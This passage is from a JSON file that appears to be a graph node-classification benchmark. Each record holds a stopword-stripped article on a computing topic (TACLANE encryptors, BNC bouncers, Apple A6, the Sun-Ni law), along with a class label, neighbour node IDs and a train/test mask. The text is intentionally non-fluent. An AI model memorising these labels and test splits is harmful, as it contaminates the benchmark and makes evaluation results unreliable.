    "text": "TACLANE:taclane taclane short tactical fastlane tactical local area network encryption family inline network encryptors ine developed manufactured general dynamics mission systems meet national security agency nsa requirements high assurance internet protocol encryptor haipe version 4.1 nov 2013 taclane devices type 1 key-agile in-line network encryptors provide network communications security internet protocol ip asynchronous transfer mode atm networks individual user enclaves users security level typically deployed department defense dod tactical strategic networks government agencies contractors taclanes allow users communicate securely legacy networks mobile subscriber equipment packet network non-secure internet protocol router network niprnet secret internet protocol router network siprnet emerging atm networks taclanes provide encryption ip datagram traffic atm traffic ip datagrams encapsulated atm cells support variety ip atm mixed network configurations taclanes used overlay secure virtual private network top existing public and/or private network infrastructures taclane-micro introduced became certified nsa 2007 protect classified information top secret 2014 announced general dynamics c4 systems general dynamics mission systems delivered 100,000 taclane-micro encryptors u.s. navy space naval warfare systems command spawar taclane-c100 designated suite b cryptographic high value product chvp encryptor certified national security agency nsa suite b device secure network communications secret level 2012 certification makes c100 non-controlled cryptographic item cci taclane-10g encryptor haipe encryptor offer simultaneous ip ethernet capabilities providing 10 gbit/s throughput speed 10g secures information classified top secret sci government commercial networks encryptor became certified national security agency nsa 2015 allowed u.s government agencies order 10g encryptor taclane-1g ruggedized tactical strategic environments encryptor became nsa certified secure information classified top secret sci 2013 taclane-flex became certified nsa secure information top secret/sci level 2017 taclane-nano encryptor works integrate flyaway kits deployable systems well facilitates communications intelligence surveillance reconnaissance dismounted tactical forward deployment covert special operations encryptor certified nsa yet general dynamics mission systems announced end production product december 2015 general dynamics mission systems announced end life eol product",
    "neighbors": [
      5472,
      11109,
      395,
      3629,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 2385,
    "label": 7,
    "text": "Snapforce_CRM:snapforce crm snapforce crm comprehensive customer relationship management crm saas application developed snapforce.com primary use case customer management sales automation although also configured telephony support additional software components include customer databases customer interaction tracking reporting workflow automation snapforce crm configured handle inbound outbound calling calls logged prospect customer record automatically real time may 2014 company became first crm software provider offer telephony services native feature snapforce crm recognized one ten top players customer relationship management market report 2015",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 2386,
    "label": 9,
    "text": "Program_lifecycle_phase:program lifecycle phase program lifecycle phases stages computer program undergoes initial creation deployment execution phases edit time compile time link time distribution time installation time load time run time lifecycle phases necessarily happen linear order intertwined various ways example modifying program software developer may need repeatedly edit compile install execute computer ensure sufficient quality distributed users copies modified program downloaded installed executed users computers edit time source code program edited spans initial creation bug fix refactoring addition new features editing typically performed person automated design tools metaprogramming systems may also used compile time source code translated machine code compiler part involves language checking ensuring proper use type system result successful compilation executable link time connects necessary machine code components program including externals common programs use functions implemented external libraries must properly linked together two types linking static linking connection made compiler always prior execution dynamic linking however performed operating system os even execution distribution time process transferring copy program user distribution format typically executable may also source code especially program written interpreted language means distribution physical media usb flash drive remote download via internet installation time gets distributed program ready execution user computer often includes storing executable future loading os load time os takes program executable storage hard drive places active memory order begin execution run time execution phase central processing unit executes program machine code instructions programs may run indefinitely execution terminates either normal expected behavior abnormality crash",
    "neighbors": [
      1952,
      7018,
      10013,
      7983,
      1776,
      5395,
      2804,
      4309,
      11160,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 2387,
    "label": 4,
    "text": "BNC_(software):bnc software bnc short bounced network connection piece software used relay traffic connections computer networks much like proxy using bnc allows user hide original source user connection providing privacy well ability route traffic specific location bnc also used hide true target user connects one common usage internet relay chat irc via bnc running remote servers environment easy ascertain user ip address bnc may help hide original connection source well providing opportunity vhosts virtual hosts use vhost conceal connection better merely adds statement hostname many bncs remain connected irc server event client disconnect internet often state changes tracked may relayed client upon reconnection implementations opt store messages sent across network client would normally received send upon clients reconnection often considered much resource dependent commercial hosting services provide logging features bot like functions may included various implementations standard list bouncer software bncs also often used file transfer protocol ftp hide user server route traffic specific location ftp bouncers divided two different categories entry traffic entry bouncer acts gateway server hide existence actual server entry bouncers like cubnc used multi-server setup easy access server load balancing removes need select ftp server log trying access server farm traffic bouncers relay traffic host installed used appears bouncer actually ftp server thus hiding real location server completely multiple traffic bouncers installed parallel order balance traffic load across different links elaborate bouncers even bounce secure ssl/tls connections",
    "neighbors": [
      5760,
      5251,
      5316,
      7364,
      8582,
      4490,
      8554,
      5677,
      5199,
      6993,
      692,
      4725,
      3030,
      5591,
      7384,
      7861,
      5819,
      8157
    ],
    "mask": "Test"
  },
  {
    "node_id": 2388,
    "label": 3,
    "text": "Apple_A6:apple a6 apple a6 32-bit package package pop system chip soc designed apple inc. introduced september 12 2012 launch iphone 5 apple states twice fast twice graphics power compared predecessor apple a5 software updates devices using chip ceased 2017 release ios 11 apple a6 said use 1.3 ghz custom apple-designed armv7-a architecture based dual-core cpu called swift rather licensed cpu arm like previous designs integrated 266 mhz triple-core powervr sgx543mp3 graphics processing unit gpu swift core a6 uses new tweaked instruction set featuring elements arm cortex-a15 support advanced simd v2 vfpv4 analysis suggests swift core triple-wide frontend two fpus compared two-wide core single fpu cortex-a9 based predecessor a6 processor package also incorporates 1 gb lpddr2-1066 ram compared 512mb lpddr2-800 ram apple a5 providing double memory capacity increasing theoretical memory bandwidth 6.4 gb/s 8.5 gb/s a6 includes upgraded image signal processor isp compared isp a5 improves speed image capture low-light performance noise reduction video stabilization a6 manufactured samsung high-κ metal gate hkmg 32 nm process chip 96.71 mm large 22 smaller a5 a6 also consumes less energy predecessor version a6 higher frequency four graphic cores called apple a6x found fourth generation ipad apple a6 chip used iphones ipads generation ipod touch ipad minis apple tvs",
    "neighbors": [
      9732,
      1549,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      10840,
      9312,
      9826,
      99,
      8806,
      3691,
      8812,
      6258,
      10357,
      6264,
      10361,
      4220,
      10365,
      2686,
      638,
      6783,
      7806,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      7833,
      666,
      4251,
      5786,
      4258,
      7842,
      7844,
      4773,
      171,
      2735,
      3248,
      9913,
      4283,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      4888,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      11066,
      6971,
      11257,
      9022,
      1346,
      8003,
      10562,
      6981,
      838,
      5963,
      8525,
      1871,
      1872,
      9042,
      8534,
      3928,
      8540,
      6495,
      8544,
      1377,
      9063,
      10602,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      392,
      3977,
      6539,
      398,
      1428,
      3483,
      4508,
      10658,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      10675,
      1461,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      9174,
      10199,
      8665,
      2524,
      9182,
      4068,
      5093,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 2389,
    "label": 6,
    "text": "Compact_Pro:compact pro compact pro software data compression utility archiving compressing files apple macintosh platform major competitor stuffit early 1990s producing smaller archives less time able create self-extracting archives without use external program well distributed via shareware greatly helped popularity pc version also available extractorpc neither program actively supported introduced early 1990s compact pro originally known compactor competed stuffit suffering neglect original developer moved projects compact pro sported clean interface variety new features quickly made favorite among digerati quickly drove stuffit leadership position became popular bbs systems stuffit 3.0 fought back even powerful compression algorithm shareware version called stuffit lite features freeware stuffit expander could decompress stuffit archives compact pro archives compact pro never really regained momentum release stuffit expander maintained niche among loyal users preparation tool cyclos smaller installer delivery package notably used ambrosia software disappeared market late 1990s compact pro also served inspiration zipit pkzip-compatible archiver expressly designed look work like compact pro like archiver systems compact pro primary purpose package compress files transmission extract side link unlike systems compact pro used non-modal mac-like ui widely lauded press notable features included ability extract everything archive double-clicking finder key held automatically recognizing converting binhex formatted files back native format without separate step compact pro also featured easy-to-use system splitting files parts fit floppy disks feature archivers implemented external program odd oft-used feature ability include images notes would display archive opened using basic mechanism teachtext compact pro also included ability produce self-extracting archives although becoming common archivers time particular implementation notable extractor stub code quite small 13 kb compared stuffit 38 kb era 14400 bit/s modems worthwhile savings many considered even large bother number small third-party utilities strip stub existing archive compact pro stub could also expand files split parts rare feature time time introduction compact pro offered far fastest best compression mac use compactor files never 1 larger stuffit deluxe better best guess modes anywhere 25 400 faster ironically compact pro even faster stuffit extracting stuffit files often least double performance also allowed background operation multifinder speed remained superior systems even major upgrades ended testing late 1990s show remaining significantly faster smaller versions stuffit years later normal archives created compact pro use .cpt file extension self-extracting versions used .sea file extensions normally needed mac commonly used archives would typically stored system would normally require pcs instance",
    "neighbors": [
      2432,
      6022,
      3114,
      9388,
      2095,
      7983,
      4406,
      576,
      10817,
      11076,
      3659,
      10317,
      4174,
      4561,
      722,
      3804,
      1121,
      5096,
      10857,
      237
    ],
    "mask": "Test"
  },
  {
    "node_id": 2390,
    "label": 3,
    "text": "Northbound_interface:northbound interface computer networking computer architecture northbound interface component interface conceptualizes lower level details e.g. data functions used component northbound interface used interface higher level layers using southbound interface higher level component architectural overviews northbound interface normally drawn top component defined hence name northbound interface southbound interface decomposes concepts technical details mostly specific single component architecture southbound interfaces drawn bottom architectural overview northbound interfaces normally talk southbound interfaces higher level components vice versa northbound interface typically output-only interface opposed one accepts user input found carrier-grade network telecommunications network elements languages protocols commonly used include snmp tl1 example device capable sending syslog messages configurable user said implement northbound interface examples include smash ipmi wsman soap etc",
    "neighbors": [
      6273,
      6403,
      8262,
      9932,
      10486,
      3133
    ],
    "mask": "None"
  },
  {
    "node_id": 2391,
    "label": 3,
    "text": "Windows_Embedded_CE_6.0:windows embedded ce 6.0 windows embedded ce 6.0 codenamed yamazaki sixth major release microsoft windows embedded operating system targeted enterprise specific tools industrial controllers consumer electronics devices like digital cameras ce 6.0 features kernel supports 32,768 processes 32 process limit prior versions process receives 2 gb virtual address space 32 mb windows embedded ce 6.0 released november 1 2006 includes partial source code os currently serves basis zune hd windows mobile 6.5 based windows ce 5.2 windows phone 7 first major release windows phone operating system based windows embedded ce 6.0 r3 although windows phone 7 also using windows embedded compact 7 features windows embedded ce 6.0 r3 finalized september 2009 oems serves base platform zune hd windows phone 7 ce 6.0 r3 includes following new features abilities note features listed specific windows phone 7 zune hd",
    "neighbors": [
      8576,
      641,
      2179,
      3463,
      651,
      6797,
      8080,
      3857,
      7057,
      8976,
      2196,
      10896,
      11283,
      11539,
      4505,
      3235,
      4515,
      11301,
      3496,
      6441,
      6697,
      1581,
      5293,
      6062,
      3250,
      3890,
      9910,
      6462,
      1471,
      7615,
      321,
      7106,
      582,
      4423,
      1098,
      10957,
      9173,
      11605,
      3289,
      4316,
      8798,
      11103,
      5600,
      226,
      10338,
      2407,
      2919,
      5225,
      4074,
      8296,
      8299,
      9448,
      10989,
      5103,
      5363,
      7796,
      6265,
      3834,
      8315,
      636,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 2392,
    "label": 9,
    "text": "Steel_Bank_Common_Lisp:steel bank common lisp steel bank common lisp sbcl free common lisp implementation features high-performance native compiler unicode support threading name steel bank common lisp reference carnegie mellon university common lisp sbcl forked andrew carnegie made fortune steel industry andrew mellon successful banker sbcl descends cmucl descended spice lisp including early implementations mach operating system ibm rt pc three rivers computing corporation perq computer 1980s william newman originally announced sbcl variant cmucl december 1999 main point divergence time clean bootstrapping procedure cmucl requires already compiled executable binary compile cmucl source code whereas sbcl supported bootstrapping theoretically ansi-compliant common lisp implementation sbcl became sourceforge project september 2000 original rationale fork continue initial work done newman without destabilizing cmucl time already mature much-used implementation forking amicable since significant flows code cross-pollination two projects since sbcl attracted several developers ported multiple hardware architectures operating systems undergone many changes enhancements dropped support several cmucl extensions considers beyond scope project motif interface also developed many new ones including native threading unicode support version 1.0 released november 2006 active development continues william newman stepped project administrator sbcl april 2008 several developers taken interim management releases time tenth anniversary sbcl workshop organized",
    "neighbors": [
      10752,
      11269,
      2062,
      9231,
      9749,
      8728,
      4633,
      4122,
      8226,
      2105,
      6201,
      6717,
      8258,
      8771,
      1613,
      9299,
      3675,
      7267,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9865,
      6797,
      9875,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      8908,
      205,
      7896,
      10463,
      7392,
      7904,
      11488,
      10983,
      5360,
      5361,
      8435,
      6906,
      4865,
      3334,
      6919,
      1301,
      10012,
      3869,
      2335,
      7983,
      10547,
      823,
      311,
      6969,
      11083,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      3446,
      4992,
      2438,
      7561,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      9128,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5612,
      11255,
      4606
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2393,
    "label": 1,
    "text": "Inspec:inspec inspec major indexing database scientific technical literature published institution engineering technology iet formerly institution electrical engineers iee one iet forerunners inspec coverage extensive fields physics computing control engineering subject coverage includes astronomy electronics communications computers computing computer science control engineering electrical engineering information technology physics manufacturing production mechanical engineering due emerging concept technology business inspec also includes information technology business portfolio inspec indexed journals publishing high quality research integrating technology management economics social sciences domains sample journals include annual review financial economics aslib journal information management australian journal management international journal management economics social sciences inspec started 1967 outgrowth science abstracts service electronic records distributed magnetic tape 1980s available u.s. knowledge index low-priced dial-up version dialog service individual users made popular nearly 50 years iet employed scientists manually review items included inspec hand-indexing literature using expertise subject area make judgement call terms classification codes applied thanks work significant thesaurus developed enables content indexed far accurately context turn helps end-users discover relevant literature may otherwise remained hidden typical search queries making inspec essential tool prior art patentability searches patent drafting access inspec currently internet inspec direct various resellers inspec several print counterparts computer control abstracts frequency 12 per year covers computers computing information technology electrical electronics abstracts frequency 12 per year covers topics telecommunications electronics radio electrical power optoelectronics printed indexes subject author indexes subject guide produced twice per year physics abstracts frequency 24 per year abstracting indexing service first published institution electrical engineers first circulated science abstracts volume 1 volume 5 1898 1902 1903 1971 database different titles closely related names science abstracts section physics science abstracts section physics abstracts volume 6 volume 74 1972 societies associated authors service american institute physics 1975 1976 institute electrical electronics engineers also became author 1980 database also issued inspec-physics various formats also available part inspec database presently part inspec section physics database time physics abstracts title employed throughout 1990s science fiction writer arthur c. clarke b.s degree physics mathematics honors king college assistant editor physics abstracts 1949–1951 position allowed clarke access world ’ leading scientific journals first issue science abstracts published january 1898 first year total 1,423 abstracts published monthly intervals end year author subject index added first issue contained 110 abstracts divided 10 sections science abstracts result joint collaboration institution electrical engineers iee physical society london publication time provided without charge members societies cost publication mainly borne iee physical society financial contributions also received institution civil engineers royal society british association advancement science 1902 annual number abstracts published increased 2,362 may 1903 decided split publication two parts physics b electrical engineering decision allowed subject scope widen particularly physics result allowed larger quantity material covered since 1967 electronic access science abstracts provided inspec",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 2394,
    "label": 7,
    "text": "Supercomputer_architecture:supercomputer architecture approaches supercomputer architecture taken dramatic turns since earliest systems introduced 1960s early supercomputer architectures pioneered seymour cray relied compact innovative designs local parallelism achieve superior computational peak performance however time demand increased computational power ushered age massively parallel systems supercomputers 1970s used processors 1990s machines thousands processors began appear end 20th century massively parallel supercomputers tens thousands off-the-shelf processors norm supercomputers 21st century use 100,000 processors graphic units connected fast connections throughout decades management heat density remained key issue centralized supercomputers large amount heat generated system may also effects reducing lifetime system components diverse approaches heat management pumping fluorinert system hybrid liquid-air cooling system air cooling normal air conditioning temperatures systems massive number processors generally take one two paths one approach e.g. grid computing processing power large number computers distributed diverse administrative domains opportunistically used whenever computer available another approach large number processors used close proximity e.g. computer cluster centralized massively parallel system speed flexibility interconnect becomes important modern supercomputers used various approaches ranging enhanced infiniband systems three-dimensional torus interconnects since late 1960s growth power proliferation supercomputers dramatic underlying architectural directions systems taken significant turns early supercomputers relied small number closely connected processors accessed shared memory supercomputers 21st century use 100,000 processors connected fast networks throughout decades management heat density remained key issue centralized supercomputers seymour cray get heat motto central design philosophy continued key issue supercomputer architectures e.g. large-scale experiments blue waters large amount heat generated system may also effects reducing lifetime system components diverse approaches heat management e.g cray 2 pumped fluorinert system system x used hybrid liquid-air cooling system blue gene/p air-cooled normal air conditioning temperatures heat aquasar supercomputer used warm university campus heat density generated supercomputer direct dependence processor type used system powerful processors typically generating heat given similar underlying semiconductor technologies early supercomputers used fast closely packed processors took advantage local parallelism e.g. pipelining vector processing time number processors grew computing nodes could placed away e.g. computer cluster could geographically dispersed grid computing number processors supercomputer grows component failure rate begins become serious issue supercomputer uses thousands nodes may fail per year average system experience several node failures day price/performance general purpose graphic processors gpgpus improved number petaflop supercomputers tianhe-i nebulae started rely however systems k computer continue use conventional processors sparc-based designs overall applicability gpgpus general purpose high performance computing applications subject debate gpgpu may tuned score well specific benchmarks overall applicability everyday algorithms may limited unless significant effort spent tune application towards however gpus gaining ground 2012 jaguar supercomputer transformed titan replacing cpus gpus number independent processors supercomputer increases way access data file system share access secondary storage resources becomes prominent years number systems distributed file management developed e.g ibm general parallel file system beegfs parallel virtual file system hadoop etc number supercomputers top100 list tianhe-i use linux lustre file system cdc 6600 series computers early attempts supercomputing gained advantage existing systems relegating work peripheral devices freeing cpu central processing unit process actual data minnesota fortran compiler 6600 could sustain 500 kiloflops standard mathematical operations early supercomputers cray 1 cray 2 appeared afterwards used small number fast processors worked harmony uniformly connected largest amount shared memory could managed time early architectures introduced parallel processing processor level innovations vector processing processor perform several operations one clock cycle rather wait successive cycles time number processors increased different architectural issues emerged two issues need addressed number processors increases distribution memory processing distributed memory approach processor physically packaged close local memory memory associated processors away based bandwidth latency parameters non-uniform memory access 1960s pipelining viewed innovation 1970s use vector processors well established 1980s many supercomputers used parallel vector processors relatively small number processors early systems allowed easily use shared memory architecture allows processors access common pool memory early days common approach use uniform memory access uma access time memory location similar processors use non-uniform memory access numa allowed processor access local memory faster memory locations cache-only memory architectures coma allowed local memory processor used cache thus requiring coordination memory values changed number processors increases efficient interprocessor communication synchronization supercomputer becomes challenge number approaches may used achieve goal instance early 1980s cray x-mp system shared registers used approach processors access shared registers move data back forth used interprocessor communication synchronization however inherent challenges managing large amount shared memory among many processors resulted move distributed architectures 1980s demand computing power increased trend much larger number processors began ushering age massively parallel systems distributed memory distributed file systems given shared memory architectures could scale large number processors hybrid approaches distributed shared memory also appeared early systems computer clustering approach connects number readily available computing nodes e.g personal computers used servers via fast private local area network activities computing nodes orchestrated clustering middleware software layer sits atop nodes allows users treat cluster large one cohesive computing unit e.g via single system image concept computer clustering relies centralized management approach makes nodes available orchestrated shared servers distinct approaches peer peer grid computing also use many nodes far distributed nature 21st century top500 organization semiannual list 500 fastest supercomputers often includes many clusters e.g world fastest 2011 k computer distributed memory cluster architecture large number local semi-independent computing nodes used e.g cluster architecture speed flexibility interconnect becomes important modern supercomputers taken different approaches address issue e.g tianhe-1 uses proprietary high-speed network based infiniband qdr enhanced feiteng-1000 cpus hand blue gene/l system uses three-dimensional torus interconnect auxiliary networks global communications approach node connected six nearest neighbors similar torus used cray t3e massive centralized systems times use special-purpose processors designed specific application may use field-programmable gate arrays fpga chips gain performance sacrificing generality examples special-purpose supercomputers include belle deep blue hydra playing chess gravity pipe astrophysics mdgrape-3 protein structure computation molecular dynamics deep crack breaking des cipher grid computing uses large number computers distributed diverse administrative domains opportunistic approach uses resources whenever available example boinc volunteer-based opportunistic grid system boinc applications reached multi-petaflop levels using close half million computers connected internet whenever volunteer resources become available however types results often appear top500 ratings run general purpose linpack benchmark although grid computing success parallel task execution demanding supercomputer applications weather simulations computational fluid dynamics remained reach partly due barriers reliable sub-assignment large number tasks well reliable availability resources given time quasi-opportunistic supercomputing large number geographically disperse computers orchestrated built-in safeguards quasi-opportunistic approach goes beyond volunteer computing highly distributed systems boinc general grid computing system globus allowing middleware provide almost seamless access many computing clusters existing programs languages fortran c distributed among multiple computing resources quasi-opportunistic supercomputing aims provide higher quality service opportunistic resource sharing quasi-opportunistic approach enables execution demanding applications within computer grids establishing grid-wise resource allocation agreements fault tolerant message passing abstractly shield failures underlying resources thus maintaining opportunism allowing higher level control air-cooled ibm blue gene supercomputer architecture trades processor speed low power consumption larger number processors used room temperature using normal air-conditioning second-generation blue gene/p system processors integrated node-to-node communication logic energy-efficient achieving 371 mflops/w k computer water-cooled homogeneous processor distributed memory system cluster architecture uses 80,000 sparc64 viiifx processors eight cores total 700,000 cores—almost twice many system comprises 800 cabinets 96 computing nodes 16 gb memory 6 i/o nodes although powerful next five systems top500 list combined 824.56 mflops/w lowest power performance ratio current major supercomputer system follow system k computer called primehpc fx10 uses six-dimensional torus interconnect still one processor per node unlike k computer tianhe-1a system uses hybrid architecture integrates cpus gpus uses 14,000 xeon general-purpose processors 7,000 nvidia tesla general-purpose graphics processing units gpgpus 3,500 blades 112 computer cabinets 262 terabytes distributed memory 2 petabytes disk storage implemented via lustre clustered files tianhe-1 uses proprietary high-speed communication network connect processors proprietary interconnect network based infiniband qdr enhanced chinese made feiteng-1000 cpus case interconnect system twice fast infiniband slower interconnects supercomputers limits specific approaches continue tested boundaries reached large scale experiments e.g. 2011 ibm ended participation blue waters petaflops project university illinois blue waters architecture based ibm power7 processor intended 200,000 cores petabyte globally addressable memory 10 petabytes disk space goal sustained petaflop led design choices optimized single-core performance hence lower number cores lower number cores expected help performance programs scale well large number processors large globally addressable memory architecture aimed solve memory address problems efficient manner type programs blue waters expected run sustained speeds least one petaflop relied specific water-cooling approach manage heat first four years operation national science foundation spent 200 million project ibm released power 775 computing node derived project technology soon thereafter effectively abandoned blue waters approach architectural experiments continuing number directions e.g cyclops64 system uses supercomputer chip approach direction away use massive distributed processors 64-bit cyclops64 chip contains 80 processors entire system uses globally addressable memory architecture processors connected non-internally blocking crossbar switch communicate via global interleaved memory data cache architecture half sram bank used scratchpad memory although type architecture allows unstructured parallelism dynamically non-contiguous memory system also produces challenges efficient mapping parallel algorithms many-core system",
    "neighbors": [
      3328,
      1933,
      785,
      7699,
      11027,
      6421,
      6677,
      7963,
      6815,
      9762,
      5798,
      9126,
      6184,
      2345,
      4909,
      1454,
      3886,
      4270,
      4017,
      7218,
      10288,
      10675,
      8501,
      823,
      9911,
      8122,
      5948,
      4286,
      2113,
      8514,
      10051,
      5956,
      4423,
      1480,
      7497,
      1866,
      8523,
      4308,
      3197,
      344,
      2264,
      11353,
      1115,
      2140,
      731,
      1503,
      11487,
      4194,
      5090,
      7142,
      3431,
      1776,
      3698,
      10483,
      118,
      1399,
      3960,
      7802,
      508,
      2045,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 2395,
    "label": 6,
    "text": "List_of_file_systems:list file systems following lists identify characterize link thorough information computer file systems many older operating systems support one native file system bear name apart name operating system disk file systems usually block-oriented files block-oriented file system sequences blocks often featuring fully random-access read write modify operations file systems built-in checksumming either mirroring parity extra redundancy one several block devices solid state media flash memory similar disks interfaces different problems low level require special handling wear leveling different error detection correction algorithms typically device solid-state drive handles operations internally therefore regular file system used however certain specialized installations embedded systems industrial applications file system optimized plain flash memory advantageous record-oriented file systems files stored collection records typically associated mainframe minicomputer operating systems programs read write whole records rather bytes arbitrary byte ranges seek record boundary within records sophisticated record-oriented file systems common simple databases file systems shared-disk file systems also called shared-storage file systems san file system clustered file system even cluster file systems primarily used storage area network nodes directly access block storage file system located makes possible nodes fail without affecting access file system nodes shared-disk file systems normally used high-availability cluster together storage hardware raid shared-disk file systems normally scale 64 128 nodes shared-disk file systems may symmetric metadata distributed among nodes asymmetric centralized metadata servers distributed file systems also called network file systems many implementations made location dependent access control lists acls unless otherwise stated distributed fault-tolerant replication data nodes servers servers/clients high availability offline disconnected operation distributed parallel file systems stripe data multiple servers high performance normally used high-performance computing hpc distributed parallel file systems use object storage device osd lustre called ost chunks data together centralized metadata servers distributed file systems also parallel fault tolerant stripe replicate data multiple servers high performance maintain data integrity even server fails data lost file systems used high-performance computing hpc high-availability clusters file systems listed focus high availability scalability high performance unless otherwise stated development may called cooperative storage cloud really file systems allow access file systems operating system standpoint",
    "neighbors": [
      5120,
      2564,
      6153,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      1049,
      3611,
      5661,
      9249,
      9762,
      5158,
      3628,
      5170,
      6198,
      2616,
      7225,
      11323,
      9277,
      576,
      8772,
      8774,
      3656,
      5709,
      2129,
      1109,
      4193,
      11363,
      4708,
      5220,
      6248,
      9835,
      9836,
      7789,
      5231,
      5232,
      9840,
      9333,
      11382,
      6263,
      2168,
      9335,
      7802,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      6291,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      7881,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      4829,
      5853,
      6365,
      739,
      7907,
      8938,
      3820,
      1263,
      3312,
      9455,
      3826,
      2291,
      246,
      3834,
      3323,
      3328,
      3841,
      11012,
      5384,
      1801,
      2314,
      8461,
      4878,
      6416,
      8976,
      1810,
      6935,
      1304,
      11033,
      287,
      1825,
      6434,
      2339,
      5413,
      4390,
      7975,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      4409,
      3898,
      6970,
      8509,
      11072,
      10051,
      3909,
      2378,
      4431,
      5969,
      2901,
      3927,
      346,
      2395,
      3931,
      2397,
      4954,
      7005,
      8539,
      9569,
      5474,
      10596,
      2407,
      10087,
      3439,
      5491,
      4982,
      6519,
      1400,
      2424,
      3450,
      376,
      890,
      11128,
      11638,
      10623,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      3487,
      7070,
      935,
      10151,
      1450,
      4012,
      1454,
      6062,
      8110,
      8114,
      7603,
      8631,
      1464,
      1978,
      6591,
      8640,
      9665,
      11201,
      8643,
      9677,
      6098,
      7126,
      5086,
      2015,
      1509,
      9189,
      5612,
      1517,
      10733,
      7663,
      5106,
      3572,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 2396,
    "label": 3,
    "text": "Sun-Ni_law:sun-ni law sun-ni law sun ni law also known memory-bounded speedup memory-bounded speedup model states computing power increases corresponding increase problem size constrained system ’ memory capacity general system grows computational power problems run system increase size analogous amdahl law says problem size remains constant system sizes grow gustafson law proposes problem size scale bound fixed amount time sun-ni law states problem size scale bound memory capacity system sun-ni law initially proposed xian-he sun lionel ni proceedings ieee supercomputing conference 1990 increasing disparity cpu speed memory data access latency application execution time often depends memory speed system predicted sun ni data access become premier performance bottleneck high-end computing fact one see intuition behind sun-ni law system resources increase applications often bottlenecked memory speed bandwidth thus application achieve larger speedup utilizing memory capacity system sun-ni law applied different layers memory hierarchy system l1 cache main memory memory-bounded function w=g reveals trade-off computing memory algorithm system architecture design three speedup models sun-ni gustafson amdahl provide metric analyze speedup parallel computing amdahl ’ law focuses time reduction given fixed-size problem amdahl ’ law states sequential portion problem algorithm limits total speedup achieved system resources increase gustafson ’ law suggests beneficial build large-scale parallel system speedup grow linearly system size problem size scaled maintain fixed execution time yet memory access latency often becomes dominant factor application ’ execution time applications may scale meet time bound constraint sun-ni law instead constraining problem size time constrains problem memory capacity system words bounds based memory sun-ni law generalization amdahl law gustafson law memory-bounded function g =1 resolves amdahl law memory-bounded function g =m number processors resolves gustafson law let formula_1 scaled workload memory space constraint memory bounded speedup defined suppose formula_2 portion workload parallelized formula_3 sequential portion workload let formula_4 function reflects parallel workload increase factor memory capacity increases times let formula_5 formula_6 formula_7 memory capacity one node thus formula_8 memory bounded speedup formula_9 power function formula_10 rational numbers b formula_11 formula_12 power function coefficient 1 thus taking highest degree term determine complexity algorithm rewrite memory bounded speedup formula_13 equation formula_14 represents influence memory change change problem size suppose formula_15 memory-bounded speedup model reduces amdahl law since problem size fixed independent resource increase suppose formula_16 memory-bounded speedup model reduces gustafson law means memory capacity increases times workload also increases times data needed local every node system often simplicity matching notation amdahl law gustafson law letter g used represent memory bound function formula_14 n replaces using notation get formula_18 suppose one would like determine memory-bounded speedup matrix multiplication memory requirement matrix multiplication roughly formula_19 n dimension two n x n source matrices computation requirement formula_20 thus formula_21 formula_22 thus memory-bounded speedup matrix multiplication formula_23 following another matrix multiplication example illustrates rapid increase parallel execution time execution time n x n matrix uniprocessor formula_24 memory usage formula_25 suppose 10000 -by- 10000 matrix takes 800 mb memory factorized 1 hour uniprocessor scaled workload suppose possible factorize 320,000 -by- 320,000 matrix 32 hours time increase quite large increase problem size may valuable someones whose premier goal accuracy example astrophysicist may interested simulating n-body problem number particles large possible example shows computation intensive applications memory capacity need proportionally scale computing power memory-bounded speedup model first work reveal memory performance constraint high-end computing presents quantitative mathematical formulation trade-off memory computing based memory-bounded function w=g n w work thus also computation applications memory requirement terms capacity g reuse rate w=g gives simple effective description relation computation memory requirement architecture viewpoint memory-bounded model suggests size well speed cache match cpu performance today modern microprocessors pentium pro alpha 21164 strong arm sa110 longson-3a use 80 transistors on-chip cache rather computing components algorithm design viewpoint reduce number memory accesses reuse data possible function g gives reuse rate today term memory bound functions become general term refers functions involve extensive memory access memory complexity analysis become discipline computer algorithm analysis",
    "neighbors": [
      5798,
      9932,
      108,
      10734,
      785,
